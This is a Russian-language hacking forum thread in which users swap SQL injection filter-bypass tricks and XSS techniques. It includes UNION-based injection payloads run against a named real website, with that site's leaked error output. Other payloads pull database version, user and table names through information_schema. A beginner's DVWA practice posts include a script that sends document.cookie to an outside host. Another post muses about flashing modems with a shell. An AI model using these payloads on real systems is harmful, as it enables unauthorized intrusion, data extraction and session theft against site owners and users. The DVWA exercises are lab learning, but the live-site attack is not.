Это и на ачате есть...мне не интересно выполнение команд...ибо скрипты и sql разнесены по сервакам...мне нужен аналог information_schemata как в mysql...существует ли он для постгрес


Копай в строну pg_tables.

Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

[QUOTE="BaleHoK"]
BaleHoK said:
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память

Удалили ? Кто ? Я это был = ))

/showpost.php?p=2951596&postcount=18

trololoman96 said:
/showpost.php?p=2951596&postcount=18


У него известно название таблиц, а у меня нет.

information_schema.tables

фильтр на


from information_schema.tables


пробовал по-разному, так и так

/showpost.php?p=2289579&postcount=14623

/showpost.php?p=2386991&postcount=15253

все равно 403


/*!union*/+/*!select*/


с этим все нормально, версию он выводит

и кстати, может быть что запрос режется?

Expl0ited, только на information_schema.tables

после того как появляется в запросе — forbidden

faza02 said:
Expl0ited
, только на information_schema.tables
после того как появляется в запросе — forbidden


Попробуй такое извращение:

information_schema./**/tables

2trololoman96,

он уже писал, что такие мохинации не сработали...

Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden


попробуй полностью запрос в /*!sql*/ взять, типа


Code:
s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/

При таких фильтрах в 80% случаев помогает `.


Code:
`information_schema`.`tables`

Там было всё проще:


Code:
id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name, column_name))),(4)from(information_schema.columns) limit+1*/--+

Code:
http://hydra-gym.com/index2.php?id=63



Code:
http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+--+

But when I do id=- or id-null it gives me this error


Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23
Error: Table 'hydragym.HitCounterRef_1' doesn't exist

http://hydra-gym.com/index2.php?id=-63+union+select+63,1,1,3,4,5,6,7,8,9,0,version(),6 3,63,63,63,63,63,63,63,63,63--+


Потому что первое значение должно существовать в другой таблице.

Или через ошибку:

http://hydra-gym.com/index2.php?id=-1+union+select+concat(0x01,concat_ws(0x3a,version( ),user(),database())),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--+

У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.

Дополнение:

Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">

[QUOTE="NZT"]
NZT said:
У меня довольно простой вопрос. Я тренирую xss на DVWA. Поставил самый лекгий уровень , зарегился на online sniffer , на сайте вписал скрипт который отсылает мне куки , мне пришел отчет security=low; vc=2; PHPSESSID=b2aec6bfd1dec067e275b83f8efcb10a , но когда передомной табличка логин/пасс и я в управлениями куки в PHPSESSID вставляю то что получил то я не вхожу админом , а зарегится я могу помойму только админом. Как мне получить что то от куки или в тренировках это не делается , только получаешь отчет и все? Спасибо.
Дополнение:
Я поменял с low на medium и когда пишу alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">alert() , ">alert() , ript>alert()ript> , ? "> http://******.ru/trye.asp?sessionID=">

возникла такая идея... а нельзя ли сделать прошивку для модемов с шеллом?

ну т.е. если зашел в модем "прошить" и залить шелл ?

В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?

Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.

У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?

NZT said:
В исходнике пишет то что я вижу на экране. Когда я пишу '';!--"=&{()} то мне показывает \'\';!--\"=&{()} и если "'\ остались как написано в статье то значит что есть уязвимость. Это пассивная xss если alert() съедает?
Если да то извените за столько ламерских вопросов , я новичок и хочу научиться.
У меня не получается пасивная xss или я чего то не догоняю. В url пишу так http://localhost/denwer/dvwa/index.php?id=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/123.gif?"+document.cookie;') а куки не приходят. Что я делаю не так?


Тут все ясно, ты сделал , поэтому появились ребенки

По сабжу: XSS medium еще никто не проходил...

UPD. Скачаю-ка себе, тоже покапаюсь...

Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?


По сабжу: XSS medium еще никто не проходил...


Если просто в medium вписать скрипт который отсылает куки на снифер то куки не придут , а в low придут , а если после того что я вписал скрипт в low и поменял на medium ничего не стирая то и я захожу в ту гостевую с xss то мне приходят куки от medium. Это о чем то говорит?

И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)

Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)

Спасибо за ответы.

NZT said:
Но в статье написано что если появляется "'\ то уязвимость есть. Значит в medium есть уязвимость, не так ли?
И как различить если на сайте активная или пасивная xss , если каждый раз выскакивает алерт значит активная , а если один раз - пасивная? или как? (долго над этим думал но никак догнать не могу)
Что я сделал не так с пасивной xss ? почему мне не пришли куки? Это из за того что если уже есть активная то пасивная работать не будет? (в активной все работает)
Спасибо за ответы.


активная это если ты *make some magic* и твои грязные намерения записались куда-то на сайте. и при дальнейших посещениях этой страницы отрабатывает твой скрипт. например при заполнении анкеты где-то в былосоцсети самопальной вместо имени ты написал ">alert('webkill was here') и когда кто-то откроет твою анкету он будет видеть это окно. пассивная это например когда поиск на сайте стоит, принимает параметры в get и выводит на страницу вместе с результатами и сам поисковый запрос. всё же описано в статьях..